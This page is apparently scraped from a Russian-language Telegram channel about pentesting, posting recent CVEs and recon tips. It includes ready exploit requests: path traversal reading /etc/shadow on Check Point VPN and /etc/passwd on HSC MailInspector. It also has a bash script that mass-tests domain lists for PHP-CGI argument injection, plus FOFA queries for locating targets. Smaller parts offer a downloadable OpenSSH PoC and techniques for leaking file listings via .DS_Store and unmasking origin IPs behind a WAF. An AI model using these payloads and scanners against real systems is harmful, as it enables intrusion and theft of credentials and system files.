Pentest Notes
1.16K subscribers
141 photos
5 videos
5 files
75 links
https://www.pentestnotes.ru

Заметки про пентест, CTF и информационную безопасность

https://t.iss.one/github_exploits
Download Telegram
Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow


#0day #checkpoint
🔥2
Forwarded from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp
🔥1
Forwarded from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi

# Call the main function with the domain list file
main "$1"


*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_script.sh /path/to/domains-list

#php #xamp
🔥1
Forwarded from Proxy Bar
CVE-2024-34470 HSC MailInspector
*
POC:
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd

FOFA:
title=="..:: HSC MailInspector ::.."
🚨 Новая статья о RCE через Dependency Confusion!

Атаки на цепочку поставок, такие как "Dependency Confusion", становятся всё более изощрёнными. Злоумышленники создают пакеты с именами, идентичными приватным пакетам компаний, и загружают их в публичные репозитории. Система сборки скачивает эти вредоносные пакеты, что может привести к удалённому выполнению кода (RCE).

Примеры влзможных защитных мер включают в себя цифровые подписи пакетов, мониторинг зависимостей и тестирование в изолированных средах. Комплексный подход и регулярный аудит критически важны для безопасности.

📖 Узнайте больше и защитите свои проекты
🔥4
🔥 Нашли файл .DS_Store? Не игнорируйте! Это может быть потенциальный вектор атаки.

Что это такое? 🤔

Файл .DS_Store (Desktop Services Store) — это скрытый файл, который macOS создает в каждой директории для хранения информации о настройках отображения. По умолчанию эти файлы скрыты, поэтому невнимательные администраторы могут их пропустить и оставить в общедоступных директориях веб-сервера.

Почему это полезно? 🛠

Файл .DS_Store хранит информацию о структуре директорий. Разобрав этот файл, можно получить список всех файлов и папок в данной директории. Это особенно полезно, если названия файлов генерируются случайно и их нельзя сбрутить.


Реальный кейс 🚀

📌 При обычном сканировании директорий в корне сайта был найден .DS_Store. С помощью утилиты Python-dsstore можно было посмотреть файловое окружение, таким образом была восстановлена структура сайта. Меня заинтересовала директория files, в которой, о чудо оказался еще один .DS_Store, который раскрывал все файлы и директории рядом (см. фото). В том числе и те, которые пользователь явно не должен был видеть.

📌 Пробежав по директориям и изучив все файлы, удалось получить учетные данные от админки сайта.


💡 Для автоматизации поиска и анализа файлов .DS_Store можно использовать Python-скрипты и такие инструменты как ds_store_extractor. Это поможет сэкономить время и быстро получить структуру директорий.
2👍2
CVE-2024-33113 D-LINK DIR-845L information disclosure

Уязвимость раскрытия информации в D-LINK DIR-845L через файл bsc_sms_inbox.php.

Exploit

*
FOFA: 496 results
*

#dlink #cve
🔥2
CVE-2024-33111
D-LINK DIR-845L XSS


Маршрутизаторы D-Link DIR-845L версии 1.01KRb03 и ниже уязвимы для межсайтового скриптинга (XSS) через эндпоинт /htdocs/webinc/js/bsc_sms_inbox.php

Exploit


FOFA: 496 results
Shodan: 33 results
Censys: 42 results


#dlink #cve #xss
🔥2
Для удобства, решил сделать свой телеграм канал, куда будут публиковаться все новые PoC с github.

https://t.iss.one/github_exploits
👍3
cve-2024-6387-poc.zip
21.1 KB
CVE-2024-6387 with PoC

Обнаружена критическая уязвимость в сервере OpenSSH (sshd), в версиях с 8.5p1 по 9.8p1, затрагивающая Linux-системы на базе glibc. CVE-2024-6387, связана с race condition обработчиков сигналов SIGALRM, которая может привести к удаленному выполнению кода от имени root из-за использования функций async-signal-unsafe.

Почитать подробнее можно скачав PoC
🔥3👍1
Позвали в приватку, потестить ПО для управления инфраструктурой
Как обычно начинаю искать, куда можно пихнуть мои любимые XSS-ки, захожу в закладки а тут вот)

Гермиона, привет)
Спасибо, что предупредила, отправлять им такое, пожалуй, не буду
😁9👍2
BI.ZONE Bug Bounty обновили свою платформу, выглядит очень симпатично)

Что нового:

🔵Изменили стилевое и цветовое оформление. Визуальная часть стала более атмосферной и тематической.

🔵Внедрили систему тегов. Теперь легко отфильтровать программы по нужным критериям. Например, кто отвечает за триаж ­— компания или наши эксперты, можно ли перевести выплату на благотворительность.

🔵Добавили метрику для программы. Появилась возможность посмотреть среднее время обработки отчета в рамках каждой программы. Учитывается период с момента отправки репорта до получения информации о его финальном статусе.

Подробнее можно почитать тут:
https://t.iss.one/bizone_bb/265
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Казалось бы, описание новой критической RCE-уязвимости в Битриксе (CVSS 9.5) появилось относительно недавно, а хакеры уже все сломали.

Половина всех VMBitrix, которые видны в поисковых системах на данный момент либо мертвы, либо взломаны.

FOFA - 218 results


BDU:2024-05252
CVE-2022-29268
🔥3
При проведении пентеста важно понимать, какие домены принадлежат целевой организации. Собранная информация позволяет составить более полное представление о возможных точках входа и слабых местах.

Для этого я использую сервис Backorder
Он полезен для поиска всех доменов, связанных с определенной организацией. Особенно ценно, когда нужно понять всю доменную структуру компании.

1. Вводим доменное имя, например, "ya.ru".
2. Нажимаем на значение поля "Org".
3. Ставим галочку "Все домены".

В качестве альтернативы можно использовать https://viewdns.info/reversewhois/ (а лучше исполоьзовать оба, для получения более полной информации)
👍31
Иногда в процессе пентеста необходимо определить реальный IP-адрес сайта, который скрыт за Web Application Firewall (WAF) или другими защитными механизмами.

Один из лайфхаков, про который часто забывают, это просто получить письмо

Правда для этого потребуется сначала поискать функционал отправки писем. Это может быть подтверждение регистрации, уведомление о сбросе пароля, подписка на рекламную рассылку и т.д. не важно. Главное получить письмо

После получения нажимаем "Показать оригинал", после чего можно посмотреть IP адрес отправителя
🔥3❤‍🔥2👍1